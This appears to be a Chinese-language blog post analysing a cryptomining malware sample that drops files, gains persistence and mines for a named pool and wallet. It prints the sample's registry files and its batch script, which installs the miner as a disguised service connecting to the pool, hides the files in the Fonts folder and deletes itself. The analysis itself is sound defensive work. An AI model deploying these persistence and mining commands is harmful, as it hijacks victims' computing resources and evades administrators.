• 一个挖矿样本分析


    0x00 概述

      本来是想分析一下Sodinokibi病毒的新的变种,但是分析了一部分,被他的混淆和循环弄得有点头疼,东西还都是压在内存里。偶然翻到几年前的一个样本分析,又重新看了一下,发现自己在逆向这块几年了,也没实质性的提升,真是光阴喂了狗。这个样本是一个挖矿样本,那时候的样本挖矿还是直接CUP干到100%,还没有后来样本那样CUP占用率可配置。整体的恶意样本思路也比较清晰就是挖矿赚钱,尽量让管理员没有办法追踪,及时定位到了恶意程序了也让他不容啥掉。

    1.1 基本信息

    文件名

    explorer.exe

    文件大小

    5455872 KB

    文件MD5

    721e7123e2a413fb8fd4dc6262473f57

    文件SHA1

    89c8b778d6f56a7974357cc104ccdcb51169d907

    文件SHA256

    3966f7a96536ac2435056d0860ecb8fbc3cf52f665c48fa303149bc423fe6d3a

    文件CRC

    70AB0903

    文件类型

    exe

    1.2 分析环境

    系统win7 x64
    软件IDA,OD

    0x01 功能描述

            样本要是的功能是释放各种文件,其中包括挖矿客户端,守护程序及其他的痕迹清除,权限驻留等操作脚本。样本的目的就是给矿池wakuang.aimezi.com,钱包地址:49oJQsyUYU5GuH9hKDhdQhXvCZJT92pr27RzhmMY4uhyjSEoMXom6ciBbC4kTpwUitcXbahCuFqW6dvUr9kcBzKA8iYXics进行挖矿。

    0x02 样本调试分析

    1.查壳。样本没有进行加壳。

    2.样本创建投放文件

       对样本动态调试检测,发现样本创建并投放了5个恶意文件,其一就是创建投放conhosts.exe文件即挖矿的客户端程序。

    二是创建并投放server.reg

    Server.reg内容

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesServiceMains]

    "Description"="Performance library information from Windows Management Instrumentation (WMI) providers to clients on the network. This service only runs when Performance Data Helper is activated."

    "DisplayName"="WMI Adapter Services"


    其三是创建并投放restart.reg

    restart.reg内容

    Windows Registry Editor Version 5.00

     

    [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]

    "Tomcat"=""C:\Windows\system\svchost.exe"


    其四是释放恶意的csrss.exe程序,对挖矿客户端(conhosts.exe)有守护作用。

    并建立了相应的注册表项

    其五是创建并投放1.bat。

    1.bat内容如下所示,通过1.bat的内容可以知道,脚本的作用是启动挖矿客户端,启动相关恶意程序,并完成相关脚本的删除工作。

    @csrss.exe install WindowsATE conhosts -a cryptonight -o stratum+tcp://wakuang.aimezi.com:7777 -u 49oJQsyUYU5GuH9hKDhdQhXvCZJT92pr27RzhmMY4uhyjSEoMXom6ciBbC4kTpwUitcXbahCuFqW6dvUr9kcBzKA8iYXics -p x -nofee 1 -dbg -1 -t 1

    @csrss.exe start WindowsATE

    @C:Windows egedit /s server.reg

    @C:Windows egedit /s restart.reg

    @del server.reg

    @del restart.reg

    @attrib +s +h C:WindowsFontsconhosts.exe

    @attrib +s +h C:WindowsFontslibcurl.dll

    @attrib +s +h C:WindowsFontslibeay32.dll

    @attrib +s +h C:WindowsFontslibgcc_s_seh-1.dll

    @attrib +s +h C:WindowsFontslibstdc++-6.dll

    @attrib +s +h C:WindowsFontslibwinpthread-1.dll

    @attrib +s +h C:WindowsFontsssleay32.dll.dll

    @attrib +s +h C:WindowsFontsmsvcr71.dll

    @attrib +s +h C:WindowsFontscsrss.dll

    @attrib +s +h C:WindowsFontszlib1.dll

    @del %0


    3. 创建安装服务启动项在逆向代码中的可以看到,安装了WindowsATE服务项

    4.清除日志操作从样本的静态及动态分析结果来看,样本在运行的时候会执行清除日志的命令

    通过ida的静态分析也发现了相关的日志清除日志

    5.启动挖矿客户端的命令行代码,矿池地址,通信端口等。 对样本进行逆向,可以看到启动客户端的地址,端口等信息。

    0x03 总结

        就是一个简单的挖矿样本分析,当时这个样本出现的时候,正式struts2漏洞大杀四方的时候,很多都是通过struts2漏洞进行投放的。


     


     

  • 相关阅读:
    mybatis 查询一对多子表只能查出一条数据
    Docker 查看容器里Log4写的日 志文 件里的日志
    MYSQL之union的使用
    【前端开发】常见好用的流程图框架
    【推荐】好网站推荐
    【前端工具】好用的数据库工具Navicat
    jQuery ajax
    thinkphp6.0封装数据库及缓存模型
    Unity 3D使用C#脚本实例
    Unity 3D简单使用C#脚本,脚本的执行顺序
  • 原文地址:https://www.cnblogs.com/A66666/p/5bac0905ef9d9f470a0d279a83165789.html
Copyright © 2020-2023  润新知